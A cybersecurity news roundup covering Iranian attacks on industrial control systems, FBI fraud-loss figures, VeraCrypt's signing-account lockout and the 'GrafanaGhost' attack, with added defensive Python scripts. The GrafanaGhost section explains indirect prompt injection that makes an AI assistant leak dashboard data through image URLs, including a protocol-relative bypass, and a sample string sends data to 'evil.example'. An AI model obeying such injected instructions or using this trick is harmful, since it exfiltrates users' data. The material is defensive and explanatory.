CyberSecurity

US Agencies Warn of Escalating Iranian Cyberattacks on Critical Infrastructure

A stark warning from America’s top security agencies signals a dangerous new phase in cyber conflict. The FBI, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Energy have jointly revealed that Iranian government-backed hackers are actively targeting the nation’s most vital systems. Their goal is not just espionage, but to inflict tangible disruption on American soil.

A Shift Towards Disruption and Damage

This represents a significant tactical escalation. Historically, many state-sponsored cyber operations focused on intelligence gathering. Now, the advisory indicates a clear intent to cause “operational disruption and financial loss.” The hackers are specifically going after the operational technology that keeps the country running: programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems. These are the digital brains behind water treatment plants, power grids, and local government facilities.

Consequently, the threat is no longer theoretical. Reports confirm that attackers have successfully manipulated information displayed on these critical devices and tampered with project files that store essential configurations. This level of access could allow them to alter chemical levels in water, disrupt energy flow, or shut down vital public services.

Understanding the Iranian Hacking Threat Landscape

The advisory points to the broader geopolitical context as a catalyst. This cyber offensive appears linked to ongoing tensions, including recent military actions. In response, Iranian cyber units have shifted from stealthy intrusions to overtly disruptive attacks.

One group, Handala, has been particularly active. This state-backed entity has been implicated in several high-profile incidents beyond infrastructure. It was blamed for a major breach at the medical technology company Stryker, where it turned the firm’s own security tooling against it to remotely wipe thousands of employee devices, and it has been linked to the leak of sensitive emails from an FBI official’s account.

Which Sectors Are Most at Risk?

The joint advisory explicitly names water and wastewater systems, the energy sector, and local government facilities as primary targets. These sectors often rely on older, internet-connected industrial control systems that were not designed with today’s advanced threats in mind. Their operational disruption carries immediate public safety and economic consequences.

Securing these environments therefore means going beyond corporate IT practice and adopting controls designed for industrial control systems, where availability and safety constraints change what can be patched, scanned or rebooted, and when.

How Should Organizations Respond?

In light of this warning, immediate action is required. The agencies recommend several defensive measures. First, critical infrastructure operators should inventory every PLC and SCADA device reachable from the internet, with the aim of removing that exposure rather than merely recording it. Second, network segmentation is essential to isolate industrial control systems from corporate IT networks, so that a compromised workstation or email account does not become a path to the process. Third, applying available security patches and firmware updates for these systems closes known vulnerabilities; where a device cannot be patched without an outage, a compensating control such as a restrictive firewall rule in front of it is better than waiting.

Proactive monitoring for anomalous activity on these networks is no longer optional. Security teams need to look for unauthorized configuration or project-file changes, unusual access patterns such as engineering-workstation logins at odd hours or from outside the OT segment, and operator displays that disagree with independent measurements.
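As an added example, not part of the advisory, the following Python script shows one way to detect the project-file tampering the advisory describes: it records a keyed (HMAC) baseline of PLC and HMI project files and reports anything added, removed or modified. The file extensions, the key and the sample files are assumptions constructed for the example; in practice the key and the baseline would live on a monitoring host, not on the engineering workstation an attacker may already control.

```python
import hashlib
import hmac
import json
import tempfile
from pathlib import Path

# Assumed: the key is held on the monitoring host, never on the engineering workstation.
BASELINE_KEY = b"replace-with-a-key-from-your-secret-store"
# Assumed project/configuration file patterns; adjust to the vendor tooling in use.
PROJECT_GLOBS = ("*.L5X", "*.ACD", "*.xml", "*.csv", "*.bin")


def _digest(path: Path) -> str:
    """SHA-256 of a file, streamed so large project archives do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: Path) -> dict[str, str]:
    """Map every matching file under root (relative POSIX path) to its digest."""
    files = {}
    for pattern in PROJECT_GLOBS:
        for p in root.rglob(pattern):
            if p.is_file():
                files[p.relative_to(root).as_posix()] = _digest(p)
    return files


def _mac(entries: dict[str, str], key: bytes) -> str:
    """HMAC over a canonical JSON encoding, so the baseline cannot be silently edited."""
    canonical = json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def build_baseline(root: Path, key: bytes = BASELINE_KEY) -> dict:
    entries = scan_tree(root)
    return {"files": entries, "mac": _mac(entries, key)}


def baseline_is_authentic(baseline: dict, key: bytes = BASELINE_KEY) -> bool:
    return hmac.compare_digest(_mac(baseline["files"], key), baseline["mac"])


def compare(root: Path, baseline: dict, key: bytes = BASELINE_KEY) -> dict:
    """Diff the live tree against the baseline; refuse a baseline whose MAC fails."""
    if not baseline_is_authentic(baseline, key):
        raise ValueError("baseline MAC mismatch: the baseline itself was altered")
    now, then = scan_tree(root), baseline["files"]
    return {
        "added": sorted(set(now) - set(then)),
        "removed": sorted(set(then) - set(now)),
        "modified": sorted(p for p in now.keys() & then.keys() if now[p] != then[p]),
    }


def demo() -> dict:
    """Constructed tree: take a baseline, then simulate an attacker changing a
    setpoint and dropping a new file. Also shows a forged baseline being rejected."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "hmi").mkdir()
        (root / "pump_station.L5X").write_bytes(b"<Program><Tag Name='ClSetpoint' Value='1.2'/></Program>")
        (root / "hmi" / "screens.xml").write_bytes(b"<Screens><Screen name='Overview'/></Screens>")
        baseline = build_baseline(root)

        # Attacker edits the chlorine setpoint and plants an extra file.
        (root / "pump_station.L5X").write_bytes(b"<Program><Tag Name='ClSetpoint' Value='9.8'/></Program>")
        (root / "hmi" / "loader.bin").write_bytes(b"\x00\x01")
        diff = compare(root, baseline)

        # Attacker also "updates" the stored hash but cannot recompute the keyed MAC.
        forged = {"files": dict(baseline["files"]), "mac": baseline["mac"]}
        forged["files"]["pump_station.L5X"] = _digest(root / "pump_station.L5X")
        diff["forged_baseline_rejected"] = not baseline_is_authentic(forged)
        return diff


if __name__ == "__main__":
    print(demo())
```

The keyed MAC is the part that matters: an attacker who can rewrite project files can usually rewrite a plain list of hashes sitting next to them, and without the key that forged baseline fails verification instead of hiding the change.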

The Broader Implications for National Security

The warning underscores a troubling convergence of physical and digital warfare. Alongside these cyber campaigns, Iran has also conducted missile and air strikes against U.S.-associated data centers in the region, causing widespread cloud service instability. This multi-domain approach aims to maximize pressure and demonstrate capability.

Ultimately, the advisory serves as an urgent call to action for both the public and private sectors. Defending critical infrastructure from Iranian hackers requires a coordinated, resilient, and well-funded strategy. The security of the nation’s water, power, and essential services depends on the ability to adapt to this evolving threat faster than the adversaries can innovate their attacks.

FBI Report Reveals $17.7 Billion Cyber Fraud Losses as AI Scams Surge

The financial toll of online crime has reached a staggering new peak. According to the latest data from the FBI, victims in the United States suffered cyber fraud losses exceeding $17.7 billion in 2025. This alarming figure, detailed in the bureau’s annual Internet Crime Report, represents a significant increase from the $16 billion lost the previous year and underscores a rapidly escalating threat landscape.

The FBI’s Internet Crime Complaint Center (IC3) fielded more than a million complaints in 2025, nearly 3,000 reports of suspected cybercrime every day and a sharp rise from the 859,532 complaints recorded in 2024.

Cryptocurrency Scams Top the List of Financial Losses

So, which schemes are draining the most money from victims? Cryptocurrency investment fraud sits firmly at the top. This single category was responsible for a colossal $7.2 billion in losses. Typically, these scams lure individuals with promises of extraordinary, guaranteed returns. Instead of profits, victims find that the fraudsters—and their funds—vanish without a trace.

Business Email Compromise Remains a Major Threat

Business Email Compromise (BEC) also remains a highly effective tool for criminals. The attacker either takes over a real corporate mailbox or spoofs one convincingly, then uses that trusted sender identity to get a wire transfer or a change of payment details approved. BEC accounted for over $3 billion in losses in 2025, the second costliest category.
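The spoofing half of BEC is something a defender can measure. SPF and DMARC are not discussed in the report, but the following added Python example (constructed here, not the FBI’s) parses a domain’s SPF and DMARC TXT records and reports whether receiving mail servers would actually reject mail that forges the domain in the From: header. The records are constructed samples with example domains; in production they come from a DNS TXT lookup of the domain and of _dmarc.<domain>.

```python
import re
from typing import Optional

# Constructed sample records (not real domains).
WEAK_SPF = "v=spf1 include:_spf.example.net ~all"
WEAK_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
STRONG_SPF = "v=spf1 include:_spf.example.net -all"
STRONG_DMARC = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com"


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_all_qualifier(record: str) -> Optional[str]:
    """Qualifier on the terminating 'all' mechanism: '-' fail, '~' softfail,
    '?' neutral, '+' pass. None if the record has no 'all' term."""
    match = re.search(r"(?:^|\s)([-~?+]?)all(?=\s|$)", record.strip())
    if not match:
        return None
    return match.group(1) or "+"


def assess_spoofing_posture(spf: Optional[str], dmarc: Optional[str]) -> dict:
    """Report whether receivers would enforce against mail forging this domain."""
    findings = []
    if not spf:
        findings.append("no SPF record: SPF never fails for any sending host")
    else:
        qualifier = spf_all_qualifier(spf)
        if qualifier in (None, "+"):
            findings.append("SPF has +all or no 'all' term: every host passes SPF")
        elif qualifier == "?":
            findings.append("SPF ends in ?all (neutral): no host ever fails SPF")

    if not dmarc or not dmarc.lower().startswith("v=dmarc1"):
        policy, pct = None, 0
        findings.append("no DMARC record: SPF/DKIM results are never enforced on From:")
    else:
        tags = parse_dmarc(dmarc)
        policy = tags.get("p", "none").lower()
        pct = int(tags.get("pct", "100"))
        if policy == "none":
            findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
        if pct < 100:
            findings.append(f"DMARC pct={pct}: policy applied to only {pct}% of failing mail")
        if policy != "none" and tags.get("sp", policy).lower() == "none":
            findings.append("DMARC sp=none: mail forging any subdomain is not enforced")
        if "rua" not in tags:
            findings.append("no rua= address: no aggregate reports of spoofing attempts")

    # Only quarantine/reject applied to 100% of failing mail stops the spoofed message.
    enforced = policy in ("quarantine", "reject") and pct == 100
    return {"dmarc_policy": policy, "enforced": enforced, "findings": findings}


if __name__ == "__main__":
    for label, spf, dmarc in (("weak", WEAK_SPF, WEAK_DMARC), ("strong", STRONG_SPF, STRONG_DMARC)):
        result = assess_spoofing_posture(spf, dmarc)
        print(label, "enforced:", result["enforced"])
        for finding in result["findings"]:
            print("  -", finding)
```

A domain at p=none with ~all is the common weak state: it collects reports but delivers the forged invoice anyway. Note that none of this helps against the other half of BEC, a genuinely compromised mailbox, where the mail passes SPF and DMARC because it really did come from the victim’s account; that case needs out-of-band verification of payment changes.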

Tech Support and Identity Theft Round Out Major Threats

Meanwhile, fake tech or customer support scams defrauded Americans of more than $2 billion, making it the third-largest source of cyber fraud losses. Other persistent threats like identity theft, data breaches, and ransomware also contributed significantly to the year’s devastating financial totals.

The Rising Cost of AI-Enabled Cyber Fraud

Perhaps the most ominous development in the 2025 report is the formal recognition of artificial intelligence as a weapon for fraudsters. For the first time in its 25-year history, the Internet Crime Report included a dedicated section on AI-enabled crime. Victims lost nearly $893 million to these sophisticated schemes, with the IC3 receiving 22,364 related complaints.

“AI-enabled synthetic content is becoming increasingly difficult to detect and easier to make,” the report states. This lets criminals craft convincing fraud targeting individuals, businesses, and financial institutions: generated phishing emails, and audio and video deepfakes that power everything from romance scams to elaborate plots in which a fabricated persona secures a remote job and then defrauds the employer from within.

Therefore, the line between reality and digital fabrication is blurring, creating unprecedented challenges for security.

A Call for Vigilance in a Digital Age

In response to these evolving dangers, the FBI has issued a stark warning. “It has never been more important to be diligent with your cybersecurity, social media footprint, and electronic interactions,” said Jose A. Perez, operations director for the FBI’s Criminal and Cyber Branch. He added that cyber threats will continue to evolve as the world adopts new technologies like AI.

Proactive defense is no longer optional. Earlier this year, the FBI launched Operation Winter Shield, an initiative outlining critical actions organizations must take to bolster their defenses, a shift from reactive to preventative security postures.

Ultimately, the data paints a clear picture: while technology creates opportunity, it also opens new avenues for exploitation. The record-breaking cyber fraud losses of 2025 are a powerful reminder that awareness, skepticism, and robust digital hygiene are essential personal and corporate responsibilities.

Microsoft Account Lockout Threatens VeraCrypt’s Future for Windows Users

The popular open-source encryption tool VeraCrypt faces an existential crisis on Windows. Its lead developer, Mounir Idrassi, has revealed that Microsoft terminated the account he used for years to sign critical Windows drivers and bootloaders. This action, taken without explanation or appeal, could soon prevent millions of users from accessing their fully encrypted systems.

Idrassi, based in Japan, said he attempted to contact Microsoft but could not reach a human representative. He warns that devices using VeraCrypt’s full-disk encryption may become unbootable starting in late June. The situation exposes a single point of failure in software that millions rely on for data security.

How Microsoft’s Policy Endangers Encryption Software

At the heart of the crisis is Microsoft’s code-signing requirement. To keep malware out of the boot path, Windows loads drivers and boot-critical components only if they carry a valid digital signature chaining to a certificate it trusts, and Idrassi’s now-terminated account was the channel through which VeraCrypt’s driver and bootloader obtained that signature. When the certificate behind the current builds is revoked, VeraCrypt’s bootloader will fail Windows’ security checks, locking users out of their own encrypted operating systems.

For affected users, the immediate risk is not a security flaw but an access barrier. Their data remains encrypted and secure, but the pathway to decrypt and boot the system will be blocked by Windows itself. This creates a paradoxical situation where a security measure designed to protect users instead renders their secure systems inaccessible.

The Broader Implications for Open-Source Development

This incident is not isolated. It highlights a systemic power imbalance where platform gatekeepers like Microsoft and Apple hold unilateral control over software distribution. Earlier this year, developer Paris Buttfield-Addison was locked out of their Apple account, only reinstated after public outcry. Similarly, Idrassi’s case shows how account termination can happen without warning or recourse.

Therefore, the reliance on centralized platforms creates a single point of failure for critical software. VeraCrypt continues to function normally for Linux and macOS users, where distribution models are more decentralized. The problem is uniquely acute for Windows, where Microsoft controls the entire signing ecosystem. This means that even robust, open-source projects live at the mercy of corporate policy changes.

What This Means for VeraCrypt Users

Currently, VeraCrypt installations continue to work. Idrassi has confirmed there are no immediate security issues. However, the clock is ticking. By late June, when Microsoft revokes the existing certificate, systems with full-disk or system encryption enabled will likely fail to start. Users will be presented with an error screen instead of the familiar password prompt.

In addition, Idrassi cannot issue updated, re-signed versions of the software without access to his developer account. This creates a dead end for Windows development. “If the issue is not resolved by then, it would essentially mean a death sentence for VeraCrypt,” he stated bluntly. The community is left hoping for a policy reversal or a new account approval process that seems, for now, opaque and unresponsive.

Navigating the Centralized Platform Dilemma

So, what are the alternatives? For users, the immediate advice is to keep complete backups of all critical data, stored separately and restorable without the VeraCrypt bootloader; if the backup copies are themselves encrypted, use a tool that does not depend on the affected component, and do not leave sensitive data in the clear for longer than the migration requires. Because VeraCrypt still runs on Linux and macOS, a volume that Windows can no longer boot can generally still be opened from another system with the password, so make sure the password and any keyfiles are not lost along with the machine. For the developer community, the event is a stark reminder of the risks of building on proprietary platforms, and it may accelerate interest in decentralized signing mechanisms or boot paths that do not depend on Microsoft-signed components.

Ultimately, this case forces a difficult conversation about trust and control in software ecosystems. When a single account termination can jeopardize a globally used security tool, it reveals the fragility of our digital infrastructure. The resolution, or lack of one, will set a precedent for how platform companies manage their relationships with essential open-source maintainers.

The coming weeks are therefore critical. Will Microsoft provide a path to reinstatement, or will VeraCrypt for Windows become collateral damage in an automated enforcement system? The answer will affect not just one developer, but the security posture of countless users who chose encryption to protect their digital lives.

GrafanaGhost: How a Silent Exploit Evades AI Guardrails to Steal Enterprise Data

A new and critical security threat, known as the GrafanaGhost exploit, is enabling attackers to siphon off sensitive corporate information from monitoring platforms without raising alarms. This method cleverly sidesteps both client-side protections and the very AI guardrails designed to prevent such breaches, operating silently in the background.

Consequently, organizations using Grafana for analytics and monitoring are at risk. The platform often houses a treasure trove of operational intelligence, from financial performance metrics to real-time infrastructure health and customer data, making it a prime target for cybercriminals.

The Mechanics of a Stealthy Attack

Unlike conventional attacks that rely on phishing or stolen passwords, the GrafanaGhost exploit functions by chaining together subtle weaknesses in application logic and AI behavior. Attackers don’t need to break in; they manipulate the system into doing their bidding.

The process unfolds in stages. First, attackers plant content that looks legitimate to the system in data the assistant will later read. That content carries an indirect prompt injection: instructions hidden in the data rather than typed by a user, which the model cannot distinguish from its operator’s intent. These instructions can include specific phrasings that cause the model to disregard its own safety protocols for the rest of the interaction.

Bypassing Defenses with Simple Tricks

Researchers found that the exploit bypasses defenses with surprisingly simple methods. A flaw in URL validation lets an external, attacker-controlled domain pass as a trusted internal resource. In particular, a protocol-relative URL such as //attacker.example/… carries no scheme, so a check that only inspects absolute http(s):// URLs treats it as a local path, while the browser resolves it against the page’s own scheme and fetches from the external host.

“GrafanaGhost perfectly illustrates how AI integration creates a massive security blind spot,” noted Ram Varadarajan, CEO at Acalvio. “The system is used exactly as designed, but with instructions the AI cannot verify as malicious.”

The Invisible Threat to Enterprise Security

Perhaps the most alarming feature of this GrafanaGhost exploit is its complete stealth. From an administrator’s or user’s viewpoint, nothing is amiss. Dashboards load normally, and there are no phishing emails, suspicious login attempts, or system alerts to investigate.

The injected instructions make the assistant emit an image reference whose URL points at an attacker-controlled server and carries the sensitive data, financial telemetry or server state, in its query string. When the dashboard renders that image, the browser performs the request, so the exfiltration is disguised as routine activity and happens automatically and invisibly.
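To make the bypass concrete, here is an added Python example (it is neither the GrafanaGhost exploit nor Grafana’s code): a naive URL allowlist that treats anything without an explicit scheme as internal, beside a hardened check that resolves the URL the way a browser would before inspecting scheme, credentials and host, and a filter that applies the hardened check to image references in model output before rendering. The trusted host names, the base URL and the sample model output are constructed assumptions.

```python
import re
from urllib.parse import urljoin, urlsplit

# Assumed: the dashboard origin and the only hosts images may be loaded from.
BASE_URL = "https://grafana.internal.example/"
TRUSTED_HOSTS = {"grafana.internal.example", "assets.internal.example"}


def is_allowed_naive(url: str) -> bool:
    """Weak validation: only absolute http(s) URLs get a host check; anything
    else is assumed to be a relative, internal path. A protocol-relative URL
    (//host/path) has no scheme, so it is waved through, yet the browser
    resolves it against the page's scheme and fetches from 'host'."""
    if url.startswith(("http://", "https://")):
        return urlsplit(url).hostname in TRUSTED_HOSTS
    return True


def is_allowed_hardened(url: str, base: str = BASE_URL) -> bool:
    """Resolve exactly as a browser would, then check scheme, userinfo and host."""
    parts = urlsplit(urljoin(base, url))
    if parts.scheme != "https":           # rejects http:, javascript:, data: ...
        return False
    if parts.username or parts.password:  # rejects https://trusted@evil.example/
        return False
    return (parts.hostname or "").lower() in TRUSTED_HOSTS


# Markdown images ![alt](url) and HTML <img src="url"> in content about to be rendered.
IMAGE_RE = re.compile(r'!\[[^\]]*\]\(([^)\s]+)\)|<img\b[^>]*\ssrc=["\']([^"\']+)["\']', re.I)


def sanitize_rendered(text: str) -> tuple[str, list[str]]:
    """Strip image references whose destination fails the hardened check.
    Returns (sanitized text, blocked URLs) so each block can raise an alert."""
    blocked: list[str] = []

    def _replace(match: re.Match) -> str:
        url = match.group(1) or match.group(2)
        if is_allowed_hardened(url):
            return match.group(0)
        blocked.append(url)
        return "[image removed: untrusted destination]"

    return IMAGE_RE.sub(_replace, text), blocked


# Constructed model output: the second and third images are exfiltration attempts.
SAMPLE_OUTPUT = (
    "Latency looks normal. "
    "![p99](https://assets.internal.example/latency.png) "
    "![status](//evil.example/p.png?q=api_latency_p99=412ms;db-01=degraded) "
    '<img src="https://assets.internal.example@evil.example/x.gif">'
)


if __name__ == "__main__":
    clean, blocked = sanitize_rendered(SAMPLE_OUTPUT)
    print(clean)
    for url in blocked:
        print("blocked:", url, "| naive check would allow:", is_allowed_naive(url))
```

The protocol-relative image is the one the naive check lets through and the hardened check catches; the userinfo trick is caught by both here only because the naive check happened to see an explicit scheme. Resolving against the real base before checking, and rejecting any credentials in the URL, removes that dependence on luck.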

“The underlying attack pattern, indirect prompt injection leading to data exfiltration via rendered content, is a well-documented and legitimate attack type,” explained Bradley Smith, SVP and Deputy CISO at BeyondTrust.

Shifting the Cybersecurity Paradigm

This incident signals a broader shift in the threat landscape. Attackers are increasingly moving beyond traditional software vulnerabilities to target the logic and AI components of modern systems. Indirect prompt injection is becoming a weapon of choice.

As a result, traditional security playbooks are insufficient. Relying solely on application-layer security toggles is no longer viable when the attack exploits the system’s intended functions.

How to Defend Against AI-Enabled Data Theft

So, what can security teams do? Experts argue for a fundamental shift in strategy. Defense must move beyond monitoring what an AI agent is instructed to do and instead focus on its runtime behavior. What actions is it actually taking?

“To defend against this, security teams must move beyond application-layer toggles to network-level URL blocking and treat prompt injection as a primary threat rather than an edge case,” Varadarajan advised. Proactive monitoring for anomalous data flows, even from trusted processes, is now essential.

Organizations should also review and harden their Grafana deployment configurations and enforce strict outbound controls at two layers: network egress allowlisting from the hosts that serve and render dashboards, and a Content Security Policy whose img-src directive names only trusted hosts, so the browser refuses the image fetch even when application-level validation misses a case. Treating prompt injection as a primary threat in AI security reviews is crucial to a resilient defense.

Ultimately, the GrafanaGhost exploit serves as a stark reminder. As AI becomes deeply embedded in business tools, our security models must evolve just as quickly to monitor not just access, but intent and outcome.
